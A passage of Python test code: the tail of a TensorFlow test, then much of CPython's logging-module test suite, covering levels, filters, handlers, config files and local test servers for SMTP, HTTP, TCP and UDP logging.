tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual([None], tensor_data['tensor_data'])
if __name__ == "__main__":
tf.test.main()
|
test_logging.py
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
